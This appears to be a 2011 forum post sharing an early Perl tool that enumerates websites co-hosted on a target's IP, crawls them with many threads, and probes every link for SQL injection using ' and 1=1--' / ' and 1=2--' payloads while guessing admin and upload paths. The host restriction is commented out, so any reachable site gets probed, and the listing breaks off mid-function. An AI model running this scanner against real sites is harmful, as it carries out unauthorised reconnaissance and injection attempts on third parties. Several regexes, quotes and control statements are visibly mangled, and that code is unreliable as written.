自动旁注检测工具代码
仅仅是测试目的,运行基本上已经通过,但是BUG还有很多,以后慢慢更新
由于鼓励自己继续前进的原因,此版本暂时命名为 0.1 :)
简单说明:
基于whois.webhosting.info平台获取旁注网站地址,读取和处理都是多线程工作
多线程部分采用了云舒的模型,该部分引用了许多他的代码,非常感谢他的劳动:)
主要功能是SQL注入简单测试,类似于and 1=1这样的,后台管理和上传路径的检测
:)ps: 转载请注明出处,欢迎喜欢它的人修改以及完善代码
注意: 切勿在未经授权下使用该程序攻击网站,可以作为检测网站安全性的一个小工具:)
#!/usr/bin/perl
# Code by naninb
# Mac osx 10.6.6 & perl 5.10.0
# Date 2011-03-7
#-==============================-
use strict;
use warnings;
use URI::URL;
use Web::Scraper;
use LWP::Simple;
use Net::hostent;
use Socket;
use Bloom::Filter;
use threads;
use threads::shared;
use Thread::Queue;
use Thread::Semaphore;
# --- Command-line handling ---------------------------------------------------
# Accepts one or two arguments: the target hostname and an optional worker
# thread count.  Anything else prints a usage warning and exits.
if (@ARGV < 1 || @ARGV >2)
{
warn "[-] Parameters error,Please input target url, and a thread numbers ";
exit;
}
# Resolve the target to its packed IP address (Net::hostent); Get_More_Sites
# turns it back into dotted-quad form with inet_ntoa.  gethost() returns undef
# when the lookup fails, so ->addr dies here with an unhelpful message.
my $my_target = gethost($ARGV[0])->addr;
# NOTE(review): the "host>http://" literal looks like an extraction artefact.
# $host itself is never read in the visible code; the only reference to it,
# in ProcessUrl, is commented out.
my $host = URI::URL->new("host>http://".$ARGV[0])->host;
# Worker-thread limit; a literal 0 also falls through to the default of 5
# because || tests truthiness, not definedness.
my $thread_number = $ARGV[1]||5;
# Hostnames found on the same IP.  Declared without :shared, so under ithreads
# every thread works on its own copy: pushes made inside the Get_More_Sites
# thread are not visible to the main thread or to the ProcessUrl workers.
my @same_ip_sites;
# Dedup filter for discovered hostnames (used only inside Get_More_Sites).
my $gms_filter = Bloom::Filter->new( capacity => 1024, error_rate => .0001 );
# Dedup filter for crawled URLs; shared so all ProcessUrl threads see one copy.
my $pu_filter = shared_clone(Bloom::Filter->new( capacity => 10000, error_rate => .0001 ));
# Work queue of URLs; seeded by Get_More_Sites, grown by ProcessUrl.
my $sites_queue = Thread::Queue->new();
# Counting semaphore bounding the number of concurrent ProcessUrl threads.
my $semaphore = Thread::Semaphore->new( $thread_number );
# Binary semaphore serialising the detect + enqueue step inside ProcessUrl.
my $mutex = Thread::Semaphore->new( 1 );
# get others sites thread
# NOTE(review): the sub name is passed as a bareword; under `use strict` this
# is normally a quoted name or a code reference (quotes may have been lost in
# extraction).
threads->create(Get_More_Sites,$my_target);
# Scheduler loop: reap joinable threads, then either finish (queue empty and
# nothing running), wait a second (queue empty but workers still active), or
# take a semaphore slot and spawn another worker.
while( 1 )
{
# join all threads which can be joined
#my $joined = 0;
foreach ( threads->list(threads::joinable) )
{
#$joined ++;
$_->join( );
}
#print $joined, " joined ";
# if there are no url need process.
my $item = $sites_queue->pending();
if( $item == 0 )
{
# list() in scalar context yields the number of running threads.
my $active = threads->list(threads::running);
# there are no active thread, we finish the job
if( $active == 0 )
{
print "All done! ";
last;
}
# we will get some more url if there are some active threads, just wait for them
else
{
#print "[MAIN] 0 URL, but $active active thread ";
sleep 1;
next;
}
}
# if there are some url need process
#print "[MAIN] $item URLn";
# Blocks until a worker slot is free; ProcessUrl releases the slot when it
# has drained the queue.
$semaphore->down;
#print "[MAIN]Create thread.n";
# NOTE(review): `&ProcessUrl` without parentheses invokes the sub right here,
# in the main thread, and hands its return value to create(); a code
# reference was presumably intended (a backslash may have been stripped).
threads->create( &ProcessUrl );
}
# Final join of anything still alive once the scheduler loop has exited.
foreach (threads->list())
{
$_->join();
}
# Get_More_Sites($packed_ip)
#
# Runs in its own thread.  Queries whois.webhosting.info for the hostnames
# served from the target's IP, pages through the result listing, and seeds
# $sites_queue with "http://www.<name>" for every name not already seen by
# $gms_filter.  Each name is also pushed onto @same_ip_sites, but that array
# is not :shared, so the push is only visible inside this thread.
#
# Terminates the run (exit/die) when the first fetch fails, when no page count
# can be parsed, when a page scrape throws, or when nothing was queued.
#
# NOTE(review): the regexes and several quoted arguments in this sub look as
# though backslashes and quote characters were lost when the page was
# extracted; read them as intent rather than as runnable code.
sub Get_More_Sites
{
my ($site) = @_;
my $res;
my $page_number;
# Web::Scraper: every <a> on the page as { link => href, text => anchor text }.
my $html_filter = scraper {
process "//a", "list[]" => { link => @href, text => "TEXT" };
};
# Listing URL for the target IP in dotted-quad form.
my $whois_my_target = "http://whois.webhosting.info/".inet_ntoa($site);
my $first_try = get($whois_my_target);
if (!defined $first_try){
warn "[-] Get page numbers error! ";
exit;
}
# The page count is read from the "Next"/"Last" pagination link of the first
# page.  NOTE(review): in the next line the `if(...)` has been fused onto the
# end of the comment, so as printed the following block is unconditional and
# the `elsif` that follows it has no `if` to attach to.
# count pages numbersif($first_try =~ /pi=(d*)8&ob=SLD&oo=ASC">Next/i)
{
$page_number = $1;
}elsif($first_try =~ /pi=(d*)&ob=SLD&oo=ASC"> Last/i)
{
$page_number = $1;
}
# The listing service sometimes answers with a challenge page instead of
# results; there is nothing to parse in that case.
die "[-] Searching encounter random number authentication, try manual to post it! " unless defined $page_number;
# Walk every result page; the loop body is one page scrape.
my $i = 1;while($i <= $page_number)
{
# This inner $whois_my_target shadows the outer one for a single iteration.
my $whois_my_target = $whois_my_target."?pi=".$i."&ob=SLD&oo=ASC";
eval
{
$res = $html_filter->scrape( URI->new($whois_my_target) );
};
# A scrape failure ends the whole program, not just this thread: by default
# exit() called from a non-main thread terminates the application.
if( $@ )
{
#warn "$@ ";
exit;
}
for my $a_text (@{$res->{list}})
{
#print "$a_text->{link}, $a_text->{text} ";
# Keep only anchors whose href points back into the listing for the same
# name.  The anchor text is interpolated into the pattern unquoted; page
# content that reaches a regex this way is normally wrapped in \Q...\E.
if( $a_text->{link} =~ /^http://whois.webhosting.info/$a_text->{text}/ )
{
# Appears intended to reduce the name to its registrable part in $1.
if($a_text->{text} =~ /([wd]+.[w]{2,3})./)
{
# filter repeat elements
if (!$gms_filter->check($1))
{
#print "www.".$1." ";
$gms_filter->add($1);
push @same_ip_sites, "www.".$1;$sites_queue->enqueue("http://www.".$1);
}}
}
}
$i++;}
# Nothing to crawl: bail out rather than leave the main loop spinning.
if ($sites_queue->pending() < 1)
{
warn "[-] Your target have not much more sites for you, sorry! ";
exit;
}
}
# ProcessUrl()
#
# Worker-thread body.  Drains $sites_queue without blocking: each URL is
# fetched through Web::Scraper, every http/https link on the page is passed
# to the three Detect_* checks, and links not yet seen by $pu_filter are
# pushed back onto the queue.  Releases one $semaphore slot when the queue
# is empty.
#
# Scope note: the host comparison "#next if( $link->host ne $host );" is
# commented out, so any reachable link is queued and probed, not only pages on
# the target or its same-IP neighbours.  The Detect_Sql_inj requests carry a
# fixed marker appended to the URL (" and 1=1--" / " and 1=2--"), which is
# what an access-log or WAF rule would key on to spot this scanner.
sub ProcessUrl
{
# Collect every <a href> on the page.  NOTE(review): //a and @href appear
# unquoted here, presumably lost in extraction.
my $scraper = scraper
{
process //a, links[] => @href;
};
my $res;
my $link;
# dequeue_nb returns undef on an empty queue, which ends the loop.
while( my $url = $sites_queue->dequeue_nb() )
{
eval
{
$res = $scraper->scrape( URI->new($url) )->{links};
};
if( $@ )
{
#warn "$@ ";
next;
}
next if (! defined $res );
print "[+] Testing $url ";
foreach( @{$res} )
{
# Resolve relative hrefs against the page they were found on.
$link = $_->as_string;
$link = URI::URL->new($link, $url);
# not http and not https?
# (http / https read as barewords below; quotes presumably lost.)
next if( $link->scheme ne http && $link->scheme ne https );
#next if( $link->host ne $host );
# Skip links whose host is one of the same-IP names.  @same_ip_sites is
# filled in the Get_More_Sites thread and is not :shared, so from this
# thread the list is empty and nothing is actually skipped.
my $flag = 0;
foreach (@same_ip_sites)
{
($flag = 1,last) if ($_ eq $link->host);
}
next if( $flag == 1 );
$link = $link->abs->as_string;
# $mutex serialises the detect + enqueue step across all workers, so the
# Detect_* requests effectively run one thread at a time.
$mutex->down();
# detect something
# sql injection, 2011-03-07
Detect_Sql_inj($link);
# manage page path
Detect_Manage_page($link);
# upload page path
Dectect_Upload_page($link);
# Queue unseen links for crawling; key_count() is only progress output.
if( ! $pu_filter->check($link) ){
print $pu_filter->key_count(), " ", $link, " ";
$pu_filter->add($link);
$sites_queue->enqueue($link);
}
$mutex->up();
undef $link;
}
undef $res;
}
undef $scraper;
# Return the slot taken by the main loop's $semaphore->down.
$semaphore->up( );
}
# Detect_Sql_inj($url)
#
# Response-length comparison probe: for a URL that carries a query parameter,
# fetch it with " and 1=1--" and " and 1=2--" appended and print a finding when
# the two bodies differ in length.  Any dynamic content that changes between
# the two fetches trips the same condition, so the signal is weak.
#
# Uses LWP::Simple::get, which returns undef on a failed fetch; length(undef)
# then warns under `use warnings` and the comparison still runs.
#
# NOTE(review): the second request pair is byte-for-byte the same as the
# first, so the check simply runs twice (four requests per URL).
# NOTE(review): the parameter-matching regex appears to have lost its
# backslashes in extraction.
sub Detect_Sql_inj
{
my ($link) = @_;
if( $link =~ /(.*?)?(wd*)=/ )
{
my $and11 = get($link." and 1=1--");
my $and12 = get($link." and 1=2--");
print "[+] Found sql injection at the ",$link," " if( length($and11) != length($and12) );
# Repeat of the pair above.
my $and13 = get($link." and 1=1--");my $and14 = get($link." and 1=2--");
print "[+] Found sql injection at the ",$link," " if( length($and13) != length($and14) );
}}
sub Detect_Manage_page
{
my ($link) = @_;
my @mm_path = ("admin","adm","manage","administrator");
if ($link =~ /(.*?)#(.*)/){
use LWP::UserAgent;
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
$ua->env_prox